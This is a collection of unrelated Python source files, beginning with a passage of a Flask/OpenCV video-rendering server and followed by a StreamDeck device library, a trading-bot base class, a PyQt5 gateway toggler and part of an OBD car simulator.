zip_obj = ZipFile(f"static/user_renders/output{args['port']}.zip", "w")
zip_is_opened = True
file_changed = False
need_to_create_writer = False
# Fill f and f1 pair of frames for DAIN interpolation
if (render_modes_dict['boost_fps_dain']):
if (started_rendering_video):
if (frame_interp_num == 0):
cap.set(1, 0)
ret, f = cap.read()
ret, f1 = cap.read()
if (f1 is not None):
main_frame = f1.copy()
frame_interp_num += 1
else:
f = frameEdge
ret, f1 = cap.read()
if (f1 is not None):
main_frame = f1.copy()
else:
main_frame = None
else:
ret, main_frame = cap.read()
ret2, frame_background = cap2.read()
# ... otherwise read by one frame
else:
if (cap is not None):
ret, main_frame = cap.read()
ret2, frame_background = cap2.read()
# Prepare settings for image file
if server_states.source_mode == "image":
# Prepare zip opening for YOLO objects
if received_zip_command or file_changed:
zipped_images = False
zip_obj = ZipFile(f"static/user_renders/output{args['port']}.zip", "w")
zip_is_opened = True
received_zip_command = False
# print("CREATED ZIP =========================")
if file_changed:
zip_obj = ZipFile(f"static/user_renders/output{args['port']}.zip", "w")
zip_is_opened = True
file_changed = False
need_to_create_writer = False
main_frame = cv2.imread(f"{app.config['UPLOAD_FOLDER']}{server_states.source_image}")
ret2, frame_background = cap2.read()
classes_index = []
start_moment = time.time() # Timer for FPS calculation
# =============================== Draw frame with render modes and settings ===============================
if main_frame is not None:
if not server_states.view_source:
main_frame, frame_boost_sequence, frame_boost_list, classes_index, zipped_images, zip_obj, zip_is_opened = \
render_with_mode(render_modes_dict, settings_ajax, main_frame, frame_background, f, f1, yolo_network,
rcnn_network, caffe_network, superres_network, dain_network, esrgan_network,
device, output_layers, classes_index, zip_obj, zip_is_opened, zipped_images,
server_states, started_rendering_video)
with lock:
check_if_user_is_connected(timer_start, 7) # Terminate process if browser tab was closed
server_states.frame_processed += 1
elapsed_time = time.time()
fps = 1 / (elapsed_time - start_moment)
# Resize frame for HTML preview with correct aspect ratio
x_coeff = 460 / main_frame.shape[0]
x_size = round(x_coeff * main_frame.shape[1])
resized = cv2.resize(main_frame, (x_size, 460))
if render_modes_dict['extract_objects_yolo_mode'] and not server_states.view_source:
resized = draw_yolo_stats(resized, classes_index, font)
if server_states.source_mode == "image":
cv2.imwrite(
f"static/user_renders/output{args['port']}{server_states.source_image}",
main_frame,
)
if (
server_states.source_mode == "image"
and render_modes_dict['extract_and_replace_background']
and writer is not None
):
writer.write(main_frame)
# Two frames in one example
# resized1 = cv2.resize(frameList[streamIndex], (640, 360))
# resized2 = cv2.resize(main_frame, (640, 360))
# concated = cv2.vconcat([resized2, resized1, ])
# resized = cv2.resize(main_frame, (1600, 900))
# Write DAIN interpolated frames to file
if (
server_states.source_mode in ("video", "youtube", "ipcam")
and writer is not None
and started_rendering_video
):
if render_modes_dict['boost_fps_dain'] and started_rendering_video:
frame_boost_sequence, frame_boost_list = zip(
*sorted(zip(frame_boost_sequence, frame_boost_list)))
frameEdge = frame_boost_list[len(frame_boost_list)-1]
for i in range (len(frame_boost_list) - 1):
writer.write(frame_boost_list[i])
# cv2.imshow("video", frame)
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
break
else:
writer.write(main_frame)
# Preview rendering on server
cv2.imshow("video", main_frame)
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
break
# Calculate progress
if server_states.source_mode in ("video", "youtube"):
if server_states.total_frames != 0:
progress = (
server_states.frame_processed
/ server_states.total_frames
* 100
)
# Draw stats on frame
cv2.putText(
resized,
f"FPS: {str(round(fps, 2))} ({str(main_frame.shape[1])}x{str(main_frame.shape[0])})",
(40, 35),
font,
0.8,
(0, 0, 255),
2,
lineType=cv2.LINE_AA
)
if started_rendering_video:
out_file = ""
if server_states.source_mode == "youtube":
out_file = server_states.output_file_page
if server_states.source_mode in ("video", "image"):
out_file = f"output{args['port']}{file_to_render}"
cv2.putText(
resized,
f"Writing to '{out_file}' ({round(progress, 2)}%)",
(40, resized.shape[0] - 20),
font,
0.8,
(255, 0, 255),
2,
lineType=cv2.LINE_AA
)
# Copy resized frame to HTML output
output_frame = resized
# Need for communication between start page and user process
if server_states.frame_processed == 1:
print("started")
# Take screenshot if needed
if server_states.need_to_create_screenshot:
server_states.need_to_create_screenshot = False
print("Taking screenshot...")
cv2.imwrite(
f"static/user_renders/output{args['port']}Screenshot.png", main_frame
)
time.sleep(0.5)
server_states.screenshot_path = (
f"static/user_renders/output{args['port']}Screenshot.png"
)
server_states.screenshot_ready = True
if (server_states.source_mode == "image"):
started_rendering_video = False
# ... otherwise stop rendering
else:
zip_obj.close()
check_if_user_is_connected(timer_start, 7)
started_rendering_video = False
if (writer):
writer.release()
position_value = 1
# print("==================== finished ====================")
app.config["UPLOAD_FOLDER"] = UPLOAD_FOLDER
def allowed_file(filename):
return "." in filename and filename.rsplit(".", 1)[1] in ALLOWED_EXTENSIONS
def generate():
global output_frame, lock, server_states
while server_states.working_on:
with lock:
if output_frame is None:
continue
(flag, encoded_image) = cv2.imencode(".jpg", output_frame)
if not flag:
continue
yield (
b"--frame\r\n"
b"Content-Type: image/jpeg\r\n\r\n" + bytearray(encoded_image) + b"\r\n"
)
print("yield finished")
@app.route("/", methods=["GET", "POST"])
def index(device=None, action=None):
global cap, cap2, file_to_render, file_changed, server_states
if request.method == "POST":
file = None
textbox_string = ""
if 'file' in request.files:
file = request.files["file"]
print("in file")
if 'textbox' in request.form:
textbox_string = request.form.get("textbox")
# print(textbox_string.find("you"))
if textbox_string.find("youtu") != -1:
server_states.source_mode = "youtube"
server_states.source_url = textbox_string
vPafy = pafy.new(textbox_string)
play = vPafy.streams[0]
cap = cv2.VideoCapture(play.url)
server_states.total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
file_changed = True
if textbox_string.find("mjpg") != -1:
server_states.source_mode = "ipcam"
server_states.source_url = textbox_string
cap = cv2.VideoCapture()
cap.open(textbox_string)
server_states.total_frames = 1
file_changed = True
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config["UPLOAD_FOLDER"], filename))
file_extension = filename.rsplit(".", 1)[1].lower()
if file_extension in ("png", "jpg", "jpeg"):
server_states.source_mode = "image"
server_states.source_image = filename
cap2 = cv2.VideoCapture("input_videos/space.webm")
if file_extension in ("gif", "mp4", "avi", "m4v", "webm", "mkv"):
server_states.source_mode = "video"
cap = cv2.VideoCapture(os.path.join(app.config["UPLOAD_FOLDER"], filename))
server_states.total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
cap2 = cv2.VideoCapture("input_videos/space.webm")
CRED = "\033[91m"
CEND = "\033[0m"
print(
CRED
+ f"============== file {filename} uploaded ============== "
+ CEND
)
file_to_render = filename
file_changed = True
if server_states.source_mode == "video":
server_states.output_file_page = file_to_render + ".avi"
if server_states.source_mode == "youtube":
server_states.output_file_page = "youtube.avi"
if server_states.source_mode == "ipcam":
server_states.output_file_page = "ipcam.avi"
print("server_states.source_mode")
return render_template(
"index.html",
frame_processed=server_states.frame_processed,
pathToRenderedFile=f"static/user_renders/output{args['port']}{server_states.output_file_page}",
pathToZipFile=f"static/user_renders/output{args['port']}.zip",
)
@app.route("/video")
def video_feed():
# redirect(f"http://192.168.0.12:8000/results")
return Response(generate(), mimetype="multipart/x-mixed-replace; boundary=frame")
@app.route("/stats", methods=["POST"])
def send_stats():
global server_states, user_time
# timer_start = time.perf_counter()
frame_width_to_page = 0
frame_height_to_page = 0
screenshot_ready_local = False
if server_states.screenshot_ready:
screenshot_ready_local = True
server_states.screenshot_ready = False
if server_states.source_mode in ("video", "youtube", "ipcam"):
if (cap != None):
frame_width_to_page = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
frame_height_to_page = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
if server_states.source_mode == "image":
frame_width_to_page = 0
frame_height_to_page = 0
return jsonify(
{
"value": server_states.frame_processed,
"totalFrames": server_states.total_frames,
"progress": round(progress, 2),
"fps": round(fps, 2),
"workingOn": server_states.working_on,
"cpuUsage": psutil.cpu_percent(),
"freeRam": round((psutil.virtual_memory()[1] / 2.0 ** 30), 2),
"ramPercent": psutil.virtual_memory()[2],
"frameWidth": frame_width_to_page,
"frameHeight": frame_height_to_page,
"currentMode": server_states.render_mode,
"userTime": user_time,
"screenshotReady": screenshot_ready_local,
"screenshotPath": server_states.screenshot_path
# 'time': datetime.datetime.now().strftime("%H:%M:%S"),
}
)
@app.route("/settings", methods=["GET", "POST"])
def receive_settings():
global settings_ajax, timer_start, timer_end, writer, server_states, commands
if request.method == "POST":
# print("POST")
timer_start = time.perf_counter()
settings_ajax = request.get_json()
if not server_states.mode_reset_lock:
if bool(settings_ajax["modeResetCommand"]):
server_states.mode_reset_lock = True
if not server_states.video_stop_lock:
if bool(settings_ajax["videoStopCommand"]):
server_states.video_stop_lock = True
if not server_states.video_reset_lock:
if bool(settings_ajax["videoResetCommand"]):
server_states.video_reset_lock = True
if not server_states.screenshot_lock:
if bool(settings_ajax["screenshotCommand"]):
server_states.screenshot_lock = True
print("screenshot_lock")
return "", 200
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument(
"-i", "--ip", type=str, required=True, help="ip address of the device"
)
ap.add_argument(
"-o",
"--port",
type=int,
required=True,
help="port number of the server",
)
ap.add_argument("-s", "--source", type=str, default=32, help="file to render")
ap.add_argument(
"-c", "--optionsList", type=str, required=True, help="rendering options"
)
ap.add_argument(
"-m",
"--mode",
type=str,
required=True,
help="rendering mode: 'video' or 'image'",
)
args = vars(ap.parse_args())
t = threading.Thread(target=process_frame)
t.daemon = True
t.start()
app.run(
host=args["ip"],
port=args["port"],
debug=False,
threaded=True,
use_reloader=False,
)
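# --- Illustrative client sketch (not part of this server) ---
# The /settings route above expects a JSON body containing the slider keys
# from settings_ajax plus the *Command flags read in receive_settings().
# A minimal equivalent request is sketched below with a placeholder host and
# port; in practice the full settings_ajax key set should be posted, since
# the render loop indexes those keys directly.
#
# import requests
# payload = {
#     "viewSource": False,
#     "mode": "e",                      # "e" selects cartoon_effect in process_frame()
#     "superresModel": "LapSRN",
#     "esrganModel": "FALCOON",
#     "positionSliderValue": 1,
#     "modeResetCommand": True,         # ask the render loop to re-read the mode
#     "videoResetCommand": False,
#     "videoStopCommand": False,
#     "screenshotCommand": False,
# }
# requests.post("http://192.168.0.12:8002/settings", json=payload)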
|
StreamDeck.py
|
# Python Stream Deck Library
# Released under the MIT license
#
# dean [at] fourwalledcubicle [dot] com
# www.fourwalledcubicle.com
#
import threading
class DeviceManager(object):
"""
Central device manager, to enumerate any attached StreamDeck devices. An
instance of this class must be created in order to detect and use any
StreamDeck devices.
"""
USB_VID_ELGATO = 0x0fd9
USB_PID_STREAMDECK = 0x0060
@staticmethod
def _get_transport(transport):
"""
Creates a new HID transport instance from the given transport back-end
name.
:param str transport: Name of a supported HID transport back-end to use.
:rtype: Transport.* instance
:return: Instance of a HID Transport class
"""
if transport == "hidapi":
from .Transport.HIDAPI import HIDAPI
return HIDAPI()
else:
raise IOError("Invalid HID transport backend \"{}\".".format(transport))
def __init__(self, transport="hidapi"):
"""
Creates a new StreamDeck DeviceManager, used to detect attached StreamDeck devices.
:param str transport: name of the HID transport backend to use
"""
self.transport = self._get_transport(transport)
def enumerate(self):
"""
Detect attached StreamDeck devices.
:rtype: list(StreamDeck)
:return: list of :class:`StreamDeck` instances, one for each detected device.
"""
deck_devices = self.transport.enumerate(
vid=self.USB_VID_ELGATO, pid=self.USB_PID_STREAMDECK)
return [StreamDeck(d) for d in deck_devices]
class StreamDeck(object):
"""
Represents a physically attached StreamDeck device.
"""
KEY_COUNT = 15
KEY_COLS = 5
KEY_ROWS = 3
KEY_PIXEL_WIDTH = 72
KEY_PIXEL_HEIGHT = 72
KEY_PIXEL_DEPTH = 3
KEY_PIXEL_ORDER = "BGR"
KEY_IMAGE_SIZE = KEY_PIXEL_WIDTH * KEY_PIXEL_HEIGHT * KEY_PIXEL_DEPTH
def __init__(self, device):
self.device = device
self.last_key_states = [False] * self.KEY_COUNT
self.read_thread = None
self.key_callback = None
def __del__(self):
"""
Deletion handler for the StreamDeck, automatically closing the transport
if it is currently open and terminating the transport reader thread.
"""
try:
self._setup_reader(None)
self.device.close()
except Exception:
pass
def _read(self):
"""
Read handler for the underlying transport, listening for button state
changes on the underlying device, caching the new states and firing off
any registered callbacks.
"""
while self.read_thread_run:
payload = []
try:
payload = self.device.read(17)
except ValueError:
self.read_thread_run = False
if len(payload):
new_key_states = [bool(s) for s in payload[1:]]
if self.key_callback is not None:
for k, (old, new) in enumerate(zip(self.last_key_states, new_key_states)):
if old != new:
self.key_callback(self, k, new)
self.last_key_states = new_key_states
def _setup_reader(self, callback):
"""
Sets up the internal transport reader thread with the given callback,
for asynchronous processing of HID events from the device. If the thread
already exists, it is terminated and restarted with the new callback
function.
:param function callback: Callback to run on the reader thread.
"""
if self.read_thread is not None:
self.read_thread_run = False
self.read_thread.join()
if callback is not None:
self.read_thread_run = True
self.read_thread = threading.Thread(target=callback)
self.read_thread.daemon = True
self.read_thread.start()
def open(self):
"""
Opens the device for input/output. This must be called prior to setting
or retrieving any device state.
.. seealso:: See :func:`~StreamDeck.close` for the corresponding close method.
"""
self.device.open()
self._setup_reader(self._read)
def close(self):
"""
Closes the device for input/output.
.. seealso:: See :func:`~StreamDeck.open` for the corresponding open method.
"""
self.device.close()
def connected(self):
"""
Indicates if the physical StreamDeck device this instance is attached to
is still connected to the host.
:rtype: bool
:return: `True` if the deck is still connected, `False` otherwise.
"""
return self.device.connected()
def id(self):
"""
Retrieves the physical ID of the attached StreamDeck. This can be used
to differentiate one StreamDeck from another.
:rtype: str
:return: Identifier for the attached device.
"""
return self.device.path()
def key_count(self):
"""
Retrieves number of physical buttons on the attached StreamDeck device.
:rtype: int
:return: Number of physical buttons.
"""
return self.KEY_COUNT
def key_layout(self):
"""
Retrieves the physical button layout on the attached StreamDeck device.
:rtype: (int, int)
:return (rows, columns): Number of button rows and columns.
"""
return self.KEY_ROWS, self.KEY_COLS
def key_image_format(self):
"""
Retrieves the image format accepted by the attached StreamDeck device.
Images should be given in this format when setting an image on a button.
.. seealso:: See :func:`~StreamDeck.set_key_image` method to update the
image displayed on a StreamDeck button.
:rtype: dict()
:return: Dictionary describing the various image parameters
(width, height, pixel depth and RGB order).
"""
return {
"width": self.KEY_PIXEL_WIDTH,
"height": self.KEY_PIXEL_HEIGHT,
"depth": self.KEY_PIXEL_DEPTH,
"order": self.KEY_PIXEL_ORDER,
}
def reset(self):
"""
Resets the StreamDeck, clearing all button images and showing the
standby image.
"""
payload = bytearray(17)
payload[0:2] = [0x0B, 0x63]
self.device.write_feature(payload)
def set_brightness(self, percent):
"""
Sets the global screen brightness of the StreamDeck, across all the
physical buttons.
:param int/float percent: brightness percent, from [0-100] as an `int`,
or normalized to [0.0-1.0] as a `float`.
"""
if type(percent) is float:
percent = int(100.0 * percent)
percent = min(max(percent, 0), 100)
payload = bytearray(17)
payload[0:6] = [0x05, 0x55, 0xaa, 0xd1, 0x01, percent]
self.device.write_feature(payload)
def set_key_image(self, key, image):
"""
Sets the image of a button on the StreamDeck to the given image. The
image being set should be in the correct format for the device, as an
enumerable collection of pixels.
.. seealso:: See :func:`~StreamDeck.key_image_format` method for
information on the image format accepted by the device.
:param int key: Index of the button whose image is to be updated.
:param enumerable image: Pixel data of the image to set on the button.
If `None`, the key will be cleared to a black
color.
"""
image = bytes(image or self.KEY_IMAGE_SIZE)
if not 0 <= key < self.KEY_COUNT:
raise IndexError("Invalid key index {}.".format(key))
if len(image) != self.KEY_IMAGE_SIZE:
raise ValueError("Invalid image size {}.".format(len(image)))
header_1 = [
0x02, 0x01, 0x01, 0x00, 0x00, key + 1, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x42, 0x4d, 0xf6, 0x3c, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x28, 0x00,
0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x48, 0x00,
0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x00, 0x00,
0x00, 0x00, 0xc0, 0x3c, 0x00, 0x00, 0xc4, 0x0e,
0x00, 0x00, 0xc4, 0x0e, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00
]
header_2 = [
0x02, 0x01, 0x02, 0x00, 0x01, key + 1, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
]
IMAGE_BYTES_PAGE_1 = 2583 * 3
payload_1 = bytes(header_1) + image[: IMAGE_BYTES_PAGE_1]
payload_2 = bytes(header_2) + image[IMAGE_BYTES_PAGE_1:]
self.device.write(payload_1)
self.device.write(payload_2)
def set_key_callback(self, callback):
"""
Sets the callback function called each time a button on the StreamDeck
changes state (either pressed, or released).
.. note:: This callback will be fired from an internal reader thread.
Ensure that the given callback function is thread-safe.
.. note:: Only one callback can be registered at one time.
.. seealso:: See :func:`~StreamDeck.set_key_callback_async` method for
a version compatible with Python 3 `asyncio` asynchronous
functions.
:param function callback: Callback function to fire each time a button
state changes.
"""
self.key_callback = callback
def set_key_callback_async(self, async_callback, loop=None):
"""
Sets the asynchronous callback function called each time a button on the
StreamDeck changes state (either pressed, or released). The given
callback should be compatible with Python 3's `asyncio` routines.
.. note:: The asynchronous callback will be fired in a thread-safe
manner.
.. note:: This will override the callback (if any) set by
:func:`~StreamDeck.set_key_callback`.
:param function async_callback: Asynchronous callback function to fire
each time a button state changes.
:param function loop: Asyncio loop to dispatch the callback into
"""
import asyncio
loop = loop or asyncio.get_event_loop()
def callback(*args):
asyncio.run_coroutine_threadsafe(async_callback(*args), loop)
self.set_key_callback(callback)
def key_states(self):
"""
Retrieves the current states of the buttons on the StreamDeck.
:rtype: list(bool)
:return: List describing the current states of each of the buttons on
the device (`True` if the button is being pressed,
`False` otherwise).
"""
return self.last_key_states
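# --- Usage sketch (illustrative, not part of the library) ---
# A minimal sketch of the API above, assuming this module is imported as part
# of the StreamDeck package, an Elgato deck is attached, and the "hidapi"
# transport is available. Key 0 is filled with solid red in the device's BGR
# pixel order, and the callback simply prints key events.
#
# from StreamDeck.StreamDeck import DeviceManager
# import time
#
# deck = DeviceManager().enumerate()[0]
# deck.open()
# deck.set_brightness(0.8)                      # floats are scaled to 0-100
# fmt = deck.key_image_format()                 # width/height/depth/order
# red = bytes([0x00, 0x00, 0xFF]) * (fmt["width"] * fmt["height"])
# deck.set_key_image(0, red)
# deck.set_key_callback(lambda d, key, state: print(key, "down" if state else "up"))
# time.sleep(10)
# deck.close()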
|
basestrat.py
|
import multiprocessing as mp
import time
import threading
import datetime
'''
How to use:
Use the longshort class as an example.
In the __init__ function, include a call to
super().__init__(pipe, logger, alpaca)
this will take care of the pipeline creation.
To send a message to the user directly, use self.talk().
To store messages in a queue and burst them after a certain point
(useful in case of too many messages), use self.m_queue.add_msg()
and it will take care of sending the message on its own
(after it stacks to 10 messages).
To make sure the running loops are terminated,
use self.stop as a checking parameter (ex. 'while not self.stop')
and use self.killcheck() to terminate the listener correctly.
Whenever sleep calls are necessary, use self.asleep() instead.
This ensures the termination happens immediately rather than
waiting on the sleep call to finish.
To check if the market is open (and wait if it is not), call self.checkMarketOpen()
This function will keep everything on hold while the market is closed, and pass once it is open.
A minimal example subclass is sketched at the end of this file.
'''
class BaseStrat:
def __init__(self, pipe, logger, alpaca):
print('base class here')
self.pipe = pipe
self.stop = False
self.logger = logger
self.alpaca = alpaca
self.listener = threading.Thread(target= self.waiter_thread)
self.m_queue = message_queue(self.pipe)
self.listener.start()
print('started listener')
def waiter_thread(self):
while True:
if self.pipe.has_data():
msg = self.pipe.read()
if msg == 'kill':
print('kill signal received from discord')
self.logger.info('Algo: kill signal received from discord')
self.kill()
return
else:
# add additional parameters in here
print("discord said something!")
def talk(self,msg):
self.pipe.send(msg)
def kill(self):
self.talk("wrapping up...")
self.logger.info("Algo: Setting stop to true..")
self.stop = True
def killcheck(self):
if self.stop:
print('killing listener first')
self.listener.join()
self.logger.info("Algo: listener successfully terminated")
def asleep(self,t):
# used in place of time.sleep so the thread stops sleeping promptly
# when the user asks it to terminate
counter = 0
while not self.stop and counter < t:
time.sleep(1)
counter += 1
self.logger.info('Algo: This guy tried to sleep but he ain\'t slick')
def checkMarketOpen(self):
tAMO = threading.Thread(target=self.awaitMarketOpen)
tAMO.start()
tAMO.join()
def awaitMarketOpen(self):
isOpen = self.alpaca.get_clock().is_open
while not isOpen and not self.stop:
clock = self.alpaca.get_clock()
openingTime = clock.next_open.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
timeToOpen = int((openingTime - currTime) / 60)
self.m_queue.add_msg(str(timeToOpen) + " minutes til market open.")
self.asleep(60 * 5)
# five minutes
isOpen = self.alpaca.get_clock().is_open
self.killcheck()
class message_queue:
def __init__(self, pipe):
self.message = ''
self.msg_count = 0
self.pipe = pipe
def add_msg(self, msg):
print('added message to queue:',msg,self.msg_count,'out of 10')
self.message += msg + '\n'
self.msg_count += 1
if self.msg_count == 10:
self.pipe.send(self.message)
self.message = ''
self.msg_count = 0
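# --- Minimal example strategy (illustrative sketch) ---
# A bare-bones subclass following the module docstring above; the pipe,
# logger and alpaca objects are assumed to be supplied by the caller, and
# the class and method names here are placeholders, not part of the original.
class ExampleStrat(BaseStrat):
    def __init__(self, pipe, logger, alpaca):
        super().__init__(pipe, logger, alpaca)  # sets up the pipe, listener and message queue

    def run(self):
        while not self.stop:
            self.checkMarketOpen()                # hold here until the market is open
            self.m_queue.add_msg('still alive')   # queued messages are sent in bursts of 10
            self.asleep(60)                       # interruptible sleep, respects the kill signal
        self.killcheck()                          # join the listener thread on shutdown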
|
gatewayTogglerClient1.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gatewayToggler.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
import socket
import sys
import threading
from PyQt5 import QtCore, QtGui, QtWidgets
from config import DeviceConfig, GatewayConfig
from socketUtil import socketServerStart
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Device Id :-"+CLIENT_ID)
Dialog.resize(400, 300)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setGeometry(QtCore.QRect(30, 240, 341, 32))
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.pushButton = QtWidgets.QPushButton(Dialog)
self.pushButton.setGeometry(QtCore.QRect(120, 20, 131, 31))
self.pushButton.setCheckable(False)
self.pushButton.setObjectName("pushButton")
self.pushButton.clicked.connect(lambda:self.changeGatewayOnClick(self.pushButton))
self.pushButton_2 = QtWidgets.QPushButton(Dialog)
self.pushButton_2.setGeometry(QtCore.QRect(120, 70, 131, 41))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_2.clicked.connect(lambda:self.changeGatewayOnClick(self.pushButton_2))
self.pushButton_3 = QtWidgets.QPushButton(Dialog)
self.pushButton_3.setGeometry(QtCore.QRect(40, 140, 75, 41))
self.pushButton_3.setObjectName("pushButton_3")
self.pushButton_3.clicked.connect(lambda:self.changeGatewayOnClick(self.pushButton_3))
self.pushButton_4 = QtWidgets.QPushButton(Dialog)
self.pushButton_4.setGeometry(QtCore.QRect(244, 142, 91, 41))
self.pushButton_4.setObjectName("pushButton_4")
self.pushButton_4.clicked.connect(lambda:self.changeGatewayOnClick(self.pushButton_4))
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Device Id :- "+CLIENT_ID))
self.pushButton.setText(_translate("Dialog", "Factory"))
self.pushButton_2.setText(_translate("Dialog", "Warehouse"))
self.pushButton_3.setText(_translate("Dialog", "Store_A"))
self.pushButton_4.setText(_translate("Dialog", "Store_B"))
def changeGatewayOnClick(self,gatewayName):
print( "Changing gateway to "+gatewayName.text())
gatewayPort = GatewayConfig[gatewayName.text()]
s = socket.socket()
s.connect(('127.0.0.1',gatewayPort))
s.send(CLIENT_ID.encode())
s.close()
CLIENT_ID = 'client1'
#Asynchronously listen to socket from server
server_port = DeviceConfig[CLIENT_ID]
x = threading.Thread(target=socketServerStart, args=[server_port], daemon=True)
x.start()
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
app = QtWidgets.QApplication(sys.argv)
Dialog = QtWidgets.QDialog()
ui = Ui_Dialog()
ui.setupUi(Dialog)
Dialog.show()
sys.exit(app.exec_())
|
elm_car_simulator.py
|
#!/usr/bin/env python3
"""Used to Reverse/Test ELM protocol auto detect and OBD message response without a car."""
import sys
import os
import struct
import binascii
import time
import threading
from collections import deque
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), ".."))
from panda import Panda
def lin_checksum(dat):
return sum(dat) % 0x100
class ELMCarSimulator():
def __init__(self, sn, silent=False, can_kbaud=500,
can=True, can11b=True, can29b=True,
lin=True):
self.__p = Panda(sn if sn else Panda.list()[0])
self.__on = True
self.__stop = False
self.__silent = silent
self.__lin_timer = None
self.__lin_active = False
self.__lin_enable = lin
self.__lin_monitor_thread = threading.Thread(target=self.__lin_monitor)
self.__can_multipart_data = None
self.__can_kbaud = can_kbaud
self.__can_extra_noise_msgs = deque()
self.__can_enable = can
self.__can11b = can11b
self.__can29b = can29b
self.__can_monitor_thread = threading.Thread(target=self.__can_monitor)
@property
def panda(self):
return self.__p
def stop(self):
if self.__lin_timer:
self.__lin_timer.cancel()
self.__lin_timeout_handler()
self.__stop = True
def join(self):
if self.__lin_monitor_thread.is_alive():
self.__lin_monitor_thread.join()
if self.__can_monitor_thread.is_alive():
self.__can_monitor_thread.join()
if self.__p:
print("closing handle")
self.__p.close()
def set_enable(self, on):
self.__on = on
def start(self):
self.panda.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
if self.__lin_enable:
self.__lin_monitor_thread.start()
if self.__can_enable:
self.__can_monitor_thread.start()
#########################
# LIN related functions #
#########################
def __lin_monitor(self):
print("STARTING LIN THREAD")
self.panda.set_uart_baud(2, 10400)
self.panda.kline_drain() # Toss whatever was already there
lin_buff = bytearray()
while not self.__stop:
lin_msg = self.panda.serial_read(2)
if not lin_msg:
continue
lin_buff += lin_msg
#print(" ** Buff", lin_buff)
if lin_buff.endswith(b'\x00\xc1\x33\xf1\x81\x66'): # Leading 0 is wakeup
lin_buff = bytearray()
self.__lin_active = True
print("GOT LIN (KWP FAST) WAKEUP SIGNAL")
self._lin_send(0x10, b'\xC1\x8F\xE9')
self.__reset_lin_timeout()
continue
if self.__lin_active:
msglen = lin_buff[0] & 0x7
if lin_buff[0] & 0xF8 not in (0x80, 0xC0):
print("Invalid bytes at start of message")
print(" BUFF", lin_buff)
continue
if len(lin_buff) < msglen + 4: continue
if lin_checksum(lin_buff[:-1]) != lin_buff[-1]: continue
self.__lin_process_msg(lin_buff[0] & 0xF8, #Priority
lin_buff[1], lin_buff[2], lin_buff[3:-1])
lin_buff = bytearray()
def _lin_send(self, to_addr, msg):
if not self.__silent:
print(" LIN Reply (%x)" % to_addr, binascii.hexlify(msg))
PHYS_ADDR = 0x80
#FUNC_ADDR = 0xC0
RECV = 0xF1
#SEND = 0x33 # Car OBD Functional Address
headers = struct.pack("BBB", PHYS_ADDR | len(msg), RECV, to_addr)
if not self.__silent:
print(" Sending LIN", binascii.hexlify(headers+msg),
hex(sum(bytearray(headers+msg))%0x100))
self.panda.kline_send(headers + msg)
def __reset_lin_timeout(self):
if self.__lin_timer:
self.__lin_timer.cancel()
self.__lin_timer = threading.Timer(5, self.__lin_timeout_handler)
self.__lin_timer.start()
def __lin_timeout_handler(self):
print("LIN TIMEOUT")
self.__lin_timer = None
self.__lin_active = False
@property
def lin_active(self):
return self.__lin_active
def __lin_process_msg(self, priority, toaddr, fromaddr, data):
self.__reset_lin_timeout()
if not self.__silent and data != b'\x3E':
print("LIN MSG", "Addr:", hex(toaddr), "obdLen:", len(data),
binascii.hexlify(data))
outmsg = None
#if data == b'\x3E':
# print("KEEP ALIVE")
#el
if len(data) > 1:
outmsg = self._process_obd(data[0], data[1])
if outmsg:
obd_header = struct.pack("BB", 0x40 | data[0], data[1])
if len(outmsg) <= 5:
self._lin_send(0x10, obd_header + outmsg)
else:
first_msg_len = min(4, len(outmsg)%4) or 4
self._lin_send(0x10, obd_header + b'\x01' +
b'\x00'*(4-first_msg_len) +
outmsg[:first_msg_len])
for num, i in enumerate(range(first_msg_len, len(outmsg), 4)):
self._lin_send(0x10, obd_header +
struct.pack('B', (num+2)%0x100) + outmsg[i:i+4])
#########################
# CAN related functions #
#########################
def __can_monitor(self):
print("STARTING CAN THREAD")
self.panda.set_can_speed_kbps(0, self.__can_kbaud)
self.panda.can_recv() # Toss whatever was already there
while not self.__stop:
for address, ts, data, src in self.panda.can_recv():
if self.__on and src == 0 and len(data) == 8 and data[0] >= 2:
if not self.__silent:
print("Processing CAN message", src, hex(address), binascii.hexlify(data))
self.__can_process_msg(data[1], data[2], address, ts, data, src)
elif not self.__silent:
print("Rejecting CAN message", src, hex(address), binascii.hexlify(data))
def can_mode_11b(self):
self.__can11b = True
self.__can29b = False
def can_mode_29b(self):
self.__can11b = False
self.__can29b = True
def can_mode_11b_29b(self):
self.__can11b = True
self.__can29b = True
def change_can_baud(self, kbaud):
self.__can_kbaud = kbaud
